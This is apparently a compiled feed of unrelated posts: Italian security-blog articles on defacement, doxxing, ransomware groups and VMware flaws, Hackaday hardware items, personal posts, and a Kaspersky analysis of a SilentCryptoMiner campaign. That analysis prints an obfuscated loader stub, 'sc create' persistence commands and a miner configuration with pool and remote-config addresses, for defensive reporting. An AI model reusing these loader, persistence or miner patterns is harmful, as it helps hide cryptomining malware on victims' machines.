Negli ultimi anni, il fenomeno del defacement di siti web ha subito un’evoluzione significativa. Se un tempo rappresentava principalmente una forma di protesta digitale da parte di gruppi hacktivisti, oggi si intreccia sempre più con la guerra psicologica, informatica e le operazioni di disinformazione.

Il defacement, o “deface”, consiste nella modifica non autorizzata di una pagina web, spesso per trasmettere messaggi politici, ideologici o propagandistici. Ma quali sono le dinamiche dietro questi attacchi?

E quali implicazioni hanno nell’attuale contesto geopolitico?

Il defacement: un’arma dell’hacktivismo

L’hacktivismo (in inglese hacktivims che nasce dall’unione di “hacking” ed “Attivism”), ha utilizzato il defacement come strumento di protesta sin dagli anni ’90. Gruppi come Anonymous e LulzSec hanno spesso attaccato siti governativi e aziendali per denunciare corruzione, censura e violazioni dei diritti umani. Questo tipo di attacco ha il vantaggio di essere visibile e di avere un forte impatto mediatico senza necessariamente causare danni permanenti ai sistemi informatici.

Un esempio storico è il deface della NASA del 2013, quando gli hacktivisti modificarono le pagine ufficiali cdel sito dell’agenzia spaziale statunitense. Tuttavia, l’hacktivismo basato sui deface è spesso criticato per la sua inefficacia a lungo termine: sebbene possa attirare l’attenzione su determinate cause, raramente porta a cambiamenti concreti.
Deface del 2013 della NASA da parte del Master Italian Hackers Team che a seguito delle indagini venne scoperto di essere stato eseguito da un hacker italiano.
L’invasione russa dell’Ucraina ha visto un’escalation senza precedenti di attività di hacktivismo, con numerosi gruppi schieratisi a sostegno di una delle due fazioni. Da un lato, gruppi pro-Russia come Killnet e Noname057(16) hanno condotto attacchi DDoS su larga scala contro infrastrutture critiche e siti governativi occidentali, cercando di destabilizzare la rete informatica dei loro avversari. Dall’altro, attori filo-ucraini, tra cui alcuni affiliati ad Anonymous, hanno risposto con attacchi mirati a siti russi, spesso utilizzando il defacement per diffondere messaggi contro il Cremlino e minare la propaganda di Mosca.

In particolare, Anonymous Italia, un gruppo che in passato ha effettuato numerosi defacement contro siti russi diffondendo il loro supporto verso i valori occidentali e verso l’ucraina. Il defacement, in questo contesto, si è rivelato uno strumento di guerra psicologia, capace di manipolare la percezione pubblica e l’opinione internazionale. Sebbene

Dalla protesta alla cyber war: quando il deface diventa strategico

Se in passato i defacement erano prevalentemente azioni simboliche, oggi sempre più spesso si inseriscono in strategie di guerra cibernetica. Stati e gruppi di cyber mercenari (o milizia cyber) utilizzano il deface non solo per propaganda, ma anche per diffondere disinformazione e destabilizzare i nemici.

Un caso esemplare è quello dei gruppi filo-russi e filo-ucraini che, dal 2022, si sono impegnati in campagne di defacement contro siti governativi, banche e media. L’obiettivo non è solo mostrare superiorità tecnica, ma anche minare la fiducia nelle istituzioni colpite e diffondere narrazioni favorevoli alla propria parte.

Questa transizione dall’hacktivismo verso la psyops e cyber war mostra come il cyberspazio sia diventato un nuovo campo di battaglia, dove l’informazione è un’arma tanto potente quanto i malware più sofisticati.
#OpSaveGaza; l’operazione di Luglio del 2014 di Anonymous_Arabe in relazione alle tensioni sulla striscia di Gaza

Tecniche e strumenti utilizzati nei defacement

Il defacement può avvenire attraverso diverse tecniche, a seconda delle vulnerabilità sfruttate dagli attaccanti. Tra i metodi più comuni troviamo:

• SQL Injection: permette di ottenere accesso ai database di un sito web e modificarne i contenuti.
• Exploiting di CMS vulnerabili: molte piattaforme, come WordPress e Joomla, sono prese di mira se non aggiornate.
• Credential stuffing: utilizzando credenziali rubate, gli hacker possono accedere ai sistemi di gestione del sito.
• Remote Code Execution: sfruttamento di bug di sicurezza e CVE note/0day per effettuare un accesso malevolo al sistema ed effettuare modifiche strutturali delle pagine

Per contrastare questi attacchi, le organizzazioni devono implementare buone pratiche di sicurezza, come aggiornamenti costanti, protezioni WAF (Web Application Firewall) e monitoraggio attivo delle minacce.

Il futuro dei deface: tra nuove minacce e misure di difesa

In un contesto di guerra ibrida, dove le operazioni cibernetiche si combinano con azioni di guerra tradizionale, il deface potrebbe diventare sempre più uno strumento di guerra psicologica (psyops). Un esempio è la possibilità di alterare siti di news per diffondere fake news credibili e manipolare l’opinione pubblica.

Le operazioni di guerra psicologica nel cyberspazio non si limitano al defacing, ma includono una gamma di tattiche come la manipolazione dei social media, la diffusione di propaganda attraverso botnet e la creazione di deepfake per screditare figure pubbliche o influenzare eventi geopolitici.

L’hacktivismo, spesso considerato un fenomeno separato dalla cyber war, può invece sovrapporsi alle psyops quando gruppi come Anonymous o altri collettivi che sfruttano gli attacchi DDoS, leak di documenti e sabotaggi digitali per influenzare la percezione pubblica e la narrativa politica. In scenari di conflitto, stati-nazione potrebbero anche sfruttare gruppi hacktivisti come proxy per condurre operazioni di disinformazione senza esporsi direttamente.

Un esempio storico è l’uso delle cyber psyops nel conflitto Russia-Ucraina, dove attori statali e non statali hanno alterato siti web, diffuso false notizie e sfruttato social media per destabilizzare il nemico. Questo dimostra come la guerra dell’informazione e le operazioni di influenza possano avere un impatto strategico, influenzando non solo l’opinione pubblica, ma anche le decisioni militari e politiche.

Deface utilizzato anche dalle forze dell’ordine

Le forze dell’ordine hanno iniziato a utilizzare il defacing come una strategia per dimostrare la compromissione delle infrastrutture informatiche di gruppi criminali, mostrando così la loro capacità di infiltrarsi nelle reti di attori malevoli. Un esempio significativo di questo approccio è l’operazione Cronos, un’azione internazionale contro il gruppo ransomware LockBit. Durante questa operazione, le autorità hanno preso il controllo dei sistemi utilizzati da LockBit per pubblicare i dati delle aziende violate e hanno effettuato il deface di alcuni dei loro siti web. Inoltre hanno utilizzato la tecnica del countdown (tipico delle cybergang ransomware) per mostrare informazioni inedite relativamente a LockBit e ai suoi affiliati.
Data Leak Site di Lockbit “deturpato” dalle forze dell’ordine nell’operazione cronos. (fonte RedHotCyber)
Un altro esempio notevole è stato l’intervento delle forze dell’ordine contro il noto marketplace del dark web Genesis Market, un sito utilizzato per la vendita di credenziali rubate e dati personali. Dopo aver smantellato il mercato, le autorità hanno sostituito il sito web con una pagina che notificava l’arresto e la rimozione della piattaforma.

Questa operazione non solo ha interrotto l’attività illegale nel clear web, ma ha anche servito a mostrare in modo visibile l’efficacia delle indagini e delle operazioni cyber nel disarticolare le reti criminali. Il defacing, in questo caso, è stato uno strumento di dimostrazione pubblica del successo delle forze dell’ordine nella lotta contro il crimine informatico.
Deface di Genesis Market alla quale chiusura ha partecipato anche la nostra Polizia Postale (Fonte RedHotCyber)
L’uso di tali tattiche da parte delle forze dell’ordine evidenzia il crescente impiego di operazioni di hacking legittimo per contrastare e smantellare le infrastrutture criminali, un approccio che potrebbe diventare sempre più comune nelle operazioni contro il crimine cibernetico.

Conclusione

Il defacement, nato come una semplice forma di protesta digitale, si è trasformato in uno strumento sofisticato per condurre psyops e guerra cibernetica e manipolazione delle informazioni. Mentre gli hacktivisti veri continuano a utilizzarlo per denunciare ingiustizie, gli attori statali – sotto doppia maschera – ingaggiano gruppi di cyber criminali mercenari integrando tali operazioni in strategie di cyber war.

Comprendere le dinamiche dietro questi attacchi è essenziale per difendersi e per anticipare le mosse di chi sfrutta il cyberspazio per fini politici e strategici.

La battaglia per la sicurezza digitale è appena iniziata, e il ruolo del defacement e del DDoS sta cambiando, e questo scenario continuerà a evolversi.

L'articolo Alla Scoperta dei Deface: tra Hacktivismo Cibernetico, Psy-Ops e Cyber Warfare proviene da il blog della sicurezza informatica.

dicorinto.it/associazionismo/s…

In recent months, we’ve seen an increase in the use of Windows Packet Divert drivers to intercept and modify network traffic in Windows systems. This technology is used in various utilities, including ones for bypassing blocks and restrictions of access to resources worldwide. Over the past six months, our systems have logged more than 2.4 million detections of such drivers on user devices.

Dynamics of Windows Packet Divert detections (download)

The growing popularity of tools using Windows Packet Divert has attracted cybercriminals. They started distributing malware under the guise of restriction bypass programs and injecting malicious code into existing programs.

Such software is often distributed in the form of archives with text installation instructions, in which the developers recommend disabling security solutions, citing false positives. This plays into the hands of attackers by allowing them to persist in an unprotected system without the risk of detection. Most active of all have been schemes for distributing popular stealers, remote access tools (RATs), Trojans that provide hidden remote access, and miners that harness computing power to mine cryptocurrency. The most commonly used malware families were NJRat, XWorm, Phemedrone and DCRat.

Blackmail as a new infection scheme

We recently uncovered a mass malware campaign infecting users with a miner disguised as a tool for bypassing blocks based on deep packet inspection (DPI). The original version of the tool is published on GitHub, where it has been starred more than 10,000 times. There is also a separate project based on it that is used to access Discord and YouTube.

According to our telemetry, the malware campaign has affected more than 2,000 victims in Russia, but the overall figure could be much higher. One of the infection channels was a YouTuber with 60,000 subscribers, who posted several videos with instructions for bypassing blocks, adding a link to a malicious archive in the description. These videos have reached more than 400,000 views. The description was later edited and the link replaced with the message “program does not work”.

The link pointed to the malicious site
gitrok[.]com, which hosted the infected archive. The counter at the time of posting the video showed more than 40,000 downloads.

Later, in discussions in the tool’s original repository, we found messages about a new distribution scheme: attackers under the guise of the tool developers sent strikes about the videos with instructions for bypassing restrictions. Next, the attackers threatened the content creators under the pretext of copyright infringement, demanding that they post videos with malicious links or risk shutdown of their YouTube channels.

Translation:
Hi, I have a question about YouTube strikes on the use of open-source code from the repository [REDACTED].
I created a tutorial video using materials from this repository, since it was publicly available on GitHub, and the video was non-commercial. But I still got hit with a YouTube strike for demonstrating the code.
I’d like to know if it’s the authors themselves or someone on their behalf who send the strikes? Or is it just a misunderstanding?

This way, the scammers were able to manipulate the reputation of popular YouTubers to force them to post links to infected files.

Example of a fraudulent message asking a YouTuber to post a link to a malicious site

Translation:
Official website: gitrok.com
All traffic should be now directed strictly to this site. GitHub remains solely a repository for developers.
If you have social networks where you’ve advertised [REDACTED], please publish a new post with a mention of our official website, and note that you can now download [REDACTED] only from there.

YouTuber complaints about cybercriminal activity

Translation:
Dear program developer @[REDACTED] YouTubers who showed how the program works and helped people unblock YouTube in Russia are having problems with scammers handing out strikes and threatening to delete these creators’ channels. They force you to shoot 2 more videos for your channel so that if anything happens they can send 2 more strikes, then it’s 3 strikes and you’re out – Google will delete the channel. YouTubers feel pressured to give in to the scammers’ demands to save their channels. But that only makes things worse.

SCAMMERS FORCE YOUTUBERS TO SHOOT VIDEOS OF THEIR PROGRAM, THAT’S WHY I DON’T HAVE A SINGLE YOUTUBE VIDEO OF THIS PROGRAM…

In addition, we found a Telegram channel actively distributing the malicious build and a video tutorial on a YouTube channel with 340,000 subscribers.

And in December 2024, users reported the distribution of a miner-infected version of the same tool through other Telegram and YouTube channels, which have since been shut down.

Infected archive

All the discovered infected archives contained one additional executable file, while the original start script
general.bat had been modified to run this file using PowerShell. In one version, if the security solution on the victim’s device deleted the malicious file, the modified start script displayed the message “File not found, disable all antiviruses and re-download the file, that will help!” to persuade the victim to run the malicious file, bypassing protection:

Contents of the original (left) and modified (right) general.bat start script

The malicious executable is a simple loader written in Python and packed into an executable application using PyInstaller. In some cases, the script has been additionally obfuscated using the PyArmor library.
import os
import subprocess
import sys
import ctypes
import base64
import tempfile
import urllib.request as urllib
import datetime
import time
import psutil
import base64
import binascii
cmb8F2SLqf1 = '595663786432497a536a424...335331453950513d3d'
decoded_hex = bytes.fromhex(cmb8F2SLqf1).decode()
step1 = base64.b64decode(decoded_hex).decode()
exec(base64.b64decode(step1).decode())

Example of the unpacked loader

The loader retrieves the URL of the next-stage payload from a hardcoded path on one of two domains:
canvas[.]pet or swapme[.]fun. After the download, it saves the payload named t.py in a temporary directory and runs it.
Note that the payload can be downloaded only from Russian IP addresses, indicating that the malware campaign was aimed at users in Russia.

Second-stage malware loader

The next stage of the infection chain was a custom Python loader based on open-source code snippets. Below are the execution steps for this script:

1. Scanning the current environment for artifacts of running on a virtual machine or in a sandbox. The loader compares system data (computer and user names, MAC addresses, unique disk identifiers (HWID), GPU parameters, etc.) with predefined lists of values used by virtual environments.
2. Adding the AppData directory to Microsoft Defender exclusions.
3. GET request to 193.233.203[.]138/WjEjoHCj/t. Depending on the response (true/false) and the specified probability, the script either downloads the executable file from the server at http://9x9o[.]com/q.txt, or uses a hardcoded block of data in Base64 format. The resulting file is saved at %LocalAppData%\driverpatch9t1ohxw8\di.exe.
4. Modifying the payload. The executable file just written to disk is modified by appending random blocks of data to the end until it reaches 690 MB in size. This technique is used to hinder automatic analysis by antivirus solutions and sandboxes.
5. Gaining persistence in the system. The loader creates a service named DrvSvc and sets its description to that of the legitimate Windows Image Acquisition (WIA) service:
   svc_name = "DrvSvc"
   svc_desc = "Launches applications associated with still image acquisition events."
   cmd_create = f'sc create {svc_name} binPath= "{exe_path}" start= auto'
   cmd_desc = f'sc description {svc_name} "{svc_desc}"'

SilentCryptoMiner

The downloaded
di.exe is a SilentCryptoMiner sample based on the open-source miner XMRig. This is a covert miner able to mine multiple cryptocurrencies (ETH, ETC, XMR, RTM and others) using various algorithms. For stealth, SilentCryptoMiner employs process hollowing to inject the miner code into a system process (in this case, dwm.exe). The malware is able to stop mining while the processes specified in the configuration are active. It can be controlled remotely via a web panel. The miner is coded to scan for indicators of running in a virtual environment and check the size of the executable itself, which must be at least 680 MB and no more than 800 MB – this is how the attackers make sure that the miner was run by the above-described loader.
The miner configuration is Base64-encoded and encrypted using the AES-CBC algorithm with the key
UXUUXUUXUUCommandULineUUXUUXUUXU and the initialization vector UUCommandULineUU. It has many parameters, including: the algorithm and URL for mining; a list of programs which upon execution cause the miner to temporarily stop and free its resources; a link to the remote configuration that the miner will receive every 100 minutes.--algo=rx/0 --url=150.241.93[.]90:443 --user="JAN2024" --pass="JAN2024" --cpu-
max-threads-hint=20 --cinit-remote-config="https://pastebin.com/raw/kDDLXFac" --
cinit-stealth-
targets="Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe" --
cinit-version="3.2.0" --tls --cinit-idle-wait=4 --cinit-idle-cpu=30 --cinit-
id="uvduaauhlrqdhmpj"
The campaign makes use of the Pastebin service to store configuration files. We detected several accounts distributing such files.

Takeaways

The topic of restriction bypass tools is being actively exploited to distribute malware. The above campaign limited itself to distributing a miner, but threat actors could start to use this vector for more complex attacks, including data theft and downloading other malware. This underscores once again that, while such tools may look enticing, they pose a serious threat to user data security.

Indicators of compromise

Infected archives

574ed9859fcdcc060e912cb2a8d1142c
91b7cfd1f9f08c24e17d730233b80d5f

PyInstaller loaders

9808b8430667f896bcc0cb132057a683
0c380d648c0c4b65ff66269e331a0f00

Malicious Python scripts

1f52ec40d3120014bb9c6858e3ba907f
a14794984c8f8ab03b21890ecd7b89cb

SilentCryptoMiner

a2a9eeb3113a3e6958836e8226a8f78f
5c5c617b53f388176173768ae19952e8
ac5cb1c0be04e68c7aee9a4348b37195

Malicious domains and IPs

hxxp://gitrok[.]com
hxxp://swapme[.]fun
hxxp://canvas[.]pet
hxxp://9x9o[.]com
193.233.203[.]138
150.241.93[.]90

securelist.com/silentcryptomin…

Nel Dark Web, l’anonimato è la valuta più preziosa. È ciò che distingue i predatori dalle prede, che consente ai cyber criminali di operare senza paura di conseguenze, che alimenta la convinzione di essere intoccabili. Ma cosa succede quando qualcosa si spezza? Quando coloro che costruiscono il proprio potere sulla paura di essere esposti diventano, a loro volta, vittime dello stesso meccanismo?

Negli ultimi anni, alcuni dei più noti protagonisti del cybercrime hanno vissuto sulla propria pelle il paradosso del doxxing: credendo di poter agire impunemente, sono stati smascherati e costretti alla fuga, a volte dalla legge, altre volte dagli stessi ambienti che un tempo li osannavano. Perché nel Dark Web, l’anonimato è solo un’illusione.

Nel mondo del doxxing, nessuna piattaforma era più temuta di Doxbin, un forum del Dark Web dove venivano pubblicate informazioni personali di individui presi di mira dalla community: giornalisti, forze dell’ordine, rivali. A gestirlo c’era KT, un personaggio enigmatico che, per anni, ha cavalcato la paura e il caos che il sito generava.

Ma nel 2022, l’equilibrio si è spezzato. Dopo aver venduto Doxbin, KT ha scoperto che il passato non si cancella facilmente nel Dark Web. In breve tempo, il nuovo amministratore ha divulgato la sua identità, esponendolo a ritorsioni, minacce e alla stessa identica dinamica che lui stesso aveva alimentato.

Nel Dark Web, il potere è effimero. Basta un solo errore, un singolo tradimento, e ciò che sembrava una fortezza diventa una prigione senza vie di fuga.

RaidForums e la Fine di Omnipotent: Il Dark Web Non Perdona

Se Doxbin rappresentava il lato più brutale del doxxing, RaidForums rappresenta il regno della compravendita di dati rubati. Qui vengono scambiati credenziali, numeri di carte di credito, informazioni sottratte a enti governativi e aziende di tutto il mondo. A regnare su questo impero c’era Omnipotent, un nome che trasmetteva onnipotenza e intoccabilità.

Eppure, nel 2022, un’operazione internazionale ha messo fine a questa illusione. Come è stato smascherato? È stata un’infiltrazione delle forze dell’ordine? Una fuga di dati interna? O forse, semplicemente, l’arroganza di sentirsi al sicuro?

Ciò che è certo è che Omnipotent è caduto. Il suo anonimato, su cui aveva costruito tutto, si è rivelato fragile. E quando l’anonimato svanisce, l’unica cosa che resta è la paura di essere trovato.

Ma il doxxing non arriva solo dall’esterno. A volte, il pericolo è dentro le stesse organizzazioni.

Il Tradimento che ha Distrutto Conti: Quando il Cybercrime si Sbriciola dall’Interno

Il gruppo ransomware Conti ha terrorizzato aziende e governi, accumulando milioni di dollari in riscatti. La loro rete era complessa, ben strutturata, apparentemente inespugnabile. Tuttavia, nel 2022, un evento inaspettato ha mandato tutto in frantumi: un insider ha deciso di pubblicare l’intero archivio delle loro conversazioni interne, rivelando strategie, affiliazioni e identità dei membri.

Non è stata la polizia, né un’operazione di intelligence. È stato un tradimento interno, il prodotto di tensioni, dissapori o forse della consapevolezza che il sistema era destinato a crollare.

Questa fuga di informazioni ha segnato la fine di Conti. Molti affiliati si sono dati alla fuga, alcuni sono stati arrestati, altri hanno tentato di reinventarsi sotto nuove identità. Ma la lezione era chiara: nel cybercrime, il nemico più letale può essere quello che siede accanto a te.

Nel Dark Web, la fiducia è un’arma a doppio taglio. Oggi sei un alleato, domani potresti essere il prossimo bersaglio.

Il doxxing è una lama senza manico. Chi lo impugna deve essere pronto a tagliarsi.

L'articolo Doxxing nel Dark Web: La Vendetta che Nessuno Può Evitare proviene da il blog della sicurezza informatica.

I team Managed XDR e Incident Response di Trend Micro hanno recentemente scoperto campagne coordinate dai gruppi ransomware Black Basta e Cactus che utilizzano una variante condivisa del malware BackConnect (rilevata come QBACKCONNECT) per stabilire un accesso persistente.

Combinazione di Ingegneria sociale e malware

Questi attacchi dimostrano una combinazione potenzialmente dannosa diingegneria sociale, abuso di strumenti legittimi e sfruttamento dell’infrastruttura cloud. La catena di attacco inizia con un’ondata di e-mail che inonda le caselle di posta delle vittime, seguita da tentativi di furto d’identità tramite Microsoft Teams.

Gli aggressori utilizzano innanzitutto tecniche di ingegneria sociale per ottenere l’accesso iniziale, ingannando le vittime e inducendole a fornire credenziali. Microsoft Teams viene sfruttato per l’impersonificazione, mentre Quick Assist e software di accesso remoto simili aiutano gli aggressori ad aumentare i privilegi.

OneDriveStandaloneUpdater.exe, uno strumento di aggiornamento Microsoft OneDrive viene utilizzato per caricare lateralmente DLL dannose, fornendo agli aggressori l’accesso alla rete.

Gli aggressori quindi distribuiscono il malware BackConnect, che consente loro di mantenere il controllo sui sistemi infetti. I file dannosi vengono ospitati e distribuiti tramite servizi di archiviazione cloud commerciali, sfruttando bucket di archiviazione non configurati correttamente o accessibili al pubblico.

I ricercatori hanno collegato il malware BackConnect a QakBot, un loader che è stato oggetto dell’operazione di smantellamento del 2023 nota come “Operazione Duckhunt”. QakBot ha svolto un ruolo cruciale nel garantire agli autori del ransomware Black Basta l’accesso ai sistemi target. Dopo la sua rimozione, questi autori della minaccia sono passati a metodi alternativi per mantenere le loro operazioni.

Malware di Sideloading e BackConnect di OneDrive

Gli aggressori sfruttano OneDriveStandaloneUpdater.exe, un file binario Microsoft legittimo, per caricare lateralmente una DLL dannosa (winhttp.dll). Questa DLL decifra i payload da settingsbackup.dat, distribuendo il malware BackConnect. Il comando e controllo persistente (C2) viene stabilito tramite IP come 38.180.25[.]3, registrati nella chiave di registro. Trend Micro attribuisce questi IP all’infrastruttura C2 di Black Basta.

BackConnect consente l’esecuzione di codice remoto, il furto di credenziali e lo spostamento laterale tramite Server Message Block (SMB) e Windows Remote Management (WinRM). Il gruppo Cactus, ora composto da ex operatori di Black Basta, impiega TTP pressoché identici. Dopo aver distribuito BackConnect, intensificano gli attacchi prendendo di mira gli hypervisor VMware ESXi. Il malware socks.out (una variante di SystemBC) disabilita la sicurezza ESXi.

L'articolo Black Basta e Cactus utilizzano Teams e OneDrive per le loro operazioni. I dettagli degli attacchi proviene da il blog della sicurezza informatica.

Talking computers are nothing these days. But in the old days, a computer that could speak was quite the novelty. Many computers from the 1970s and 1980s used an AY-3-8910 chip and [InazumaDenki] has been playing with one of these venerable chips. You can see (and hear) the results in the video below.

The chip uses PCM, and there are different ways to store and play sounds. The video shows how different they are and even looks at the output on the oscilloscope. The chip has three voices and was produced by General Instruments, the company that initially made PIC microcontrollers. It found its way into many classic arcade games, home computers, and games like Intellivision, Vectrex, the MSX, and ZX Spectrum. Soundcards for the TRS-80 Color Computer and the Apple II used these chips. The Atari ST used a variant from Yamaha, the YM2149F.

There’s some code for an ATmega, and the video says it is part one, so we expect to see more videos on this chip soon.

General instruments had other speech chips and some of them are still around in emulated form. In fact, you can emulate the AY-3-8910 with little more than a Raspberry Pi Pico.

youtube.com/embed/EJkdTjGpREg?…

hackaday.com/2025/03/05/speaki…

Buongiorno a tutti!

Voglio suggerirvi un libro che a mio avviso è importantissimo, e lo dico anche da persona che lavora nell'informatica da trent'anni e usa computer da 44, da quando internet ancora non era diffuso.

Ci troviamo di fronte a quello che a mio avviso è un capolavoro per fare capire come il Cremlino manovri l'informazione - e soprattutto la cattiva informazione - con lo scopo di destabilizzare l'Europa.

Ora i più pruriginosi di voi mi diranno che anche gli Stati Uniti lo fanno, ma è proprio leggendo il testo che si comprende come il modo sia del tutto diverso: nel caso della Russia, l'obiettivo non è creare simpatia nei loro confronti (cosa difficile, del resto, per qualsiasi umano con 2 neuroni in fila), ma creare disordine.
Nel disordine, nel caos che non ti fa più capire cosa è vero e cosa è falso, è facilissimo cedere a sovranismi, secessioni, porcate varie.

E il loro scopo è già stato raggiunto.

A questo si sommano ovviamente gli attacchi informatici...ma è tutto nel libro.

Buona lettura e, se lo leggerete, fatemi sapere cosa ne pensate.

ledizioni.it/prodotto/brigate-…

BRIGATE RUSSE -

Ledizioni - Innovative Publishing. Casa editrice universitaria. Open Access. eBook, ePub. Creative Commons.

^Ledizioni

Mi chiedo cosa ci sia di difficile da capire.

Eppure, a quanto pare c'è ancora chi è convinto che la pace si ottenga con la resa.

Il che, almeno temporaneamente, sarebbe anche vero ma senza dimenticare che pace non è uguale a giustizia.

Forse questo articolo può fare comprendere un concetto tanto semplice quanto ignorato.

esquire.com/it/news/attualita/…

Come sarebbe l'Italia se perdesse il 20% del suo territorio, tipo l'Ucraina

Perderebbe Piemonte, Liguria e Lombardia. Da San Remo fino a Ferrara.

^{Enrico Pitzianti (Esquire)}

The loudspeaker on your home entertainment equipment is designed to project audio around the space in which it operates, if it’s not omnidirectional as such it can feel that way as the surroundings reflect the sound to you wherever you are. Making a directional speaker to project sound over a long distance is considerably more difficult than making one similar to your home speaker, and [Orange_Murker] is here with a solution. At the recent Hacker Hotel conference in the Netherlands, she presented an ultrasonic parametric speaker. It projects an extremely narrow beam of sound over a significant distance, but it’s not an audio frequency speaker at all.

Those of you familiar with radio will recognize its operation; an ultrasonic carrier is modulated with the audio to be projected, and the speaker transfers that to the air. Just like the diode detector in an old AM radio, air is a nonlinear medium, and it performs a demodulation of the ultrasound to produce an audio frequency that can be heard. She spends a while going into modulation schemes, before revealing that she drove her speaker with a 40 kHz PWM via an H bridge. The speaker itself is an array of in-phase ultrasonic transducers, and she demonstrates the result on her audience.

This project is surprisingly simple, should you wish to have a go yourself. There’s a video below the break, and she’s put all the files in a GitHub repository. Meanwhile this isn’t the first time we’ve seen a project like this.

media.ccc.de/v/2025-201-build-…

hackaday.com/2025/03/04/build-…

La società Broadcom ha rilasciato aggiornamenti di sicurezza per risolvere tre vulnerabilità attivamente sfruttate nei prodotti VMware ESXi, Workstation e Fusion che potrebbero causare l’esecuzione di codice e la divulgazione di informazioni.

• CVE-2025-22224 : ha ricevuto un punteggio critico di 9,3 sulla scala CVSS ed è associato a un errore Time-of-Check Time-of-Use (TOCTOU). Può causare una vulnerabilità di scrittura fuori dai limiti, che consente a un aggressore con privilegi amministrativi locali sulla macchina virtuale di eseguire codice per conto del processo VMX sull’host.
• CVE-2025-22225 : con una valutazione di 8,2 è associato alla scrittura di dati arbitrari e può essere utilizzato per uscire dall’ambiente isolato di una macchina virtuale.
• CVE-2025-22226 : ha un livello di minaccia pari a 7,1 e consente a un aggressore con privilegi amministrativi su una macchina virtuale di leggere i dati dalla memoria del processo VMX, causando la perdita di informazioni.

Le seguenti versioni software sono vulnerabili agli attacchi: VMware ESXi 8.0 e 7.0, VMware Workstation 17.x, VMware Fusion 13.x, nonché le piattaforme VMware Cloud Foundation e VMware Telco Cloud.

Broadcom ha già rilasciato delle patch per risolvere le vulnerabilità e consiglia vivamente agli utenti di installarle il prima possibile.

Il Microsoft Threat Intelligence Center è stato il primo a identificare e segnalare i problemi. Broadcom ha riconosciuto gli attacchi ma non ha divulgato dettagli su come sono state sfruttate le vulnerabilità o sui gruppi che le hanno sfruttate negli attacchi veri e propri.

Dato l’uso attivo delle vulnerabilità negli attacchi informatici, l’aggiornamento dei sistemi è una misura di sicurezza prioritaria per gli utenti VMware.

L'articolo Allarme VMware: 3 vulnerabilità critiche attivamente sfruttate – Aggiorna subito! proviene da il blog della sicurezza informatica.

Gli analisti di Cyfirma hanno scoperto che un malware per Android chiamato SpyLend si è infiltrato nello store ufficiale di Google Play ed è stato scaricato più di 100.000 volte. Il malware era camuffato da strumento finanziario ed è stato utilizzato in India per erogare prestiti nell’ambito del programma SpyLoan.

I malware di tipo SpyLoan solitamente si mascherano da strumenti finanziari o servizi di credito legittimi, attraverso i quali agli utenti vengono offerti prestiti con approvazione rapida, ma le condizioni di tali prestiti sono spesso molto fuorvianti o semplicemente false. Inoltre, le app rubano dati dai dispositivi delle vittime per utilizzarli in seguito a fini di ricatto.

Inoltre, le app SpyLoan richiedono sempre privilegi eccessivi sul dispositivo, tra cui: il permesso di utilizzare la fotocamera (presumibilmente per caricare foto KYC), l’accesso al calendario, ai contatti, agli SMS, alla posizione, ai dati dei sensori e così via. Di conseguenza, gli operatori di tali applicazioni possono rubare dati riservati dal dispositivo e utilizzarli a scopo di ricatto, per poi costringere la vittima a pagare.

I ricercatori di Cyfirma hanno scoperto nell’app store ufficiale un’app chiamata Finance Simplified, che è stata scaricata oltre 100.000 volte e che si vanta di essere uno strumento di gestione finanziaria.

Secondo gli esperti, in alcuni Paesi come l’India, l’applicazione mostra un comportamento dannoso e ruba dati dai dispositivi degli utenti. Inoltre, sono stati scoperti altri APK dannosi che sembrano essere varianti della stessa campagna malware: KreditApple, PokketMe e StashFur.

Sebbene l’app sia già stata rimossa da Google Play, potrebbe continuare a essere eseguita in background, raccogliendo informazioni sensibili dai dispositivi infetti, tra cui:

• contatti, registri delle chiamate, messaggi SMS e dati del dispositivo;
• foto, video e documenti da memorie interne ed esterne;
• Posizione in tempo reale della vittima (aggiornata ogni 3 secondi), cronologia delle posizioni e indirizzo IP;
• le ultime 20 voci di testo copiate negli appunti;
• cronologia creditizia e messaggi SMS sulle transazioni bancarie.

Numerose recensioni degli utenti di Finance Simplified su Google Play indicano che l’app offriva servizi di prestito e poi i suoi gestori cercavano di estorcere denaro ai mutuatari se si rifiutavano di pagare alti tassi di interesse.

Sebbene i dati sopra elencati siano stati utilizzati principalmente per estorcere denaro alle persone che hanno corso il rischio di contrarre un prestito tramite Finance Simplified, potrebbero anche essere utilizzati per frodi finanziarie o rivenduti a criminali informatici.

Per evitare di essere individuato su Google Play, Finance Simplified ha utilizzato una WebView per reindirizzare gli utenti a un sito esterno, dove hanno scaricato l’APK dei prestiti ospitato su Amazon EC2. Si noti che l’applicazione scaricava un APK aggiuntivo solo se l’utente si trovava in India.

L'articolo Attenti a SpyLend: Il Malware Android con 100.000 Download su Google Play! proviene da il blog della sicurezza informatica.

While we’d like to think that pandemics and lockdowns are behind us, the reality is that a warming climate and the fast-paced travel of modern life are a perfect storm for nasty viruses. One thing that could help us curb the spread of the next pandemic may already be on your wrist.

Researchers at Aalto University, Stanford University, and Texas A&M have found that the illness detection features common to modern smartwatches are advanced enough to help people make the call to stay home or mask up and avoid getting others sick. They note we’re already at 88% accuracy for early detection of COVID-19 and 90% for the flu. Combining data from a number of other studies on smartwatch accuracy, epidemiology, behavior, and biology, the researchers were able to model the possible outcomes of this early detection on the spread of future diseases.

“Even just a 66-75 percent reduction in social contacts soon after detection by smartwatches — keeping in mind that that’s on a par with what you’d normally do if you had cold symptoms — can lead to a 40-65 percent decrease in disease transmission compared to someone isolating from the onset of symptoms,” says Märt Vesinurm.

We’ve got you covered if you’re looking for a smartwatch that looks a bit like a hospital wristband and we’ve also covered one that’s alive. That way, you’ll have a slimy friend when you’re avoiding other humans this time around. And when it’s time to develop a vaccine for whatever new bug is after us, how do MRNA vaccines work anyway?

hackaday.com/2025/03/04/smartw…

Shortwave radio has a charm all its own: part history, part mystery, and a whole lot of tech nostalgia. The Hallicrafters S-53A is a prime example of mid-century engineering, but when you get your hands on one, chances are it won’t be in mint condition. Which was exactly the case for this restoration project by [Ken’s Lab], where the biggest challenge wasn’t fried capacitors or burned-out tubes, but a stubborn band selector switch that refused to budge.

What made it come to this point? The answer is: time, oxidation, and old-school metal tolerances. Instead of forcing it (and risking a very bad day), [Ken]’s repair involved careful disassembly, a strategic application of lubricant, and a bit of patience. As the switch started to free up, another pleasant surprise emerged: all the tubes were original Hallicrafters stock. A rare find, and a solid reason to get this radio working without unnecessary modifications. Because some day, owning a shortwave radio could be a good decision.

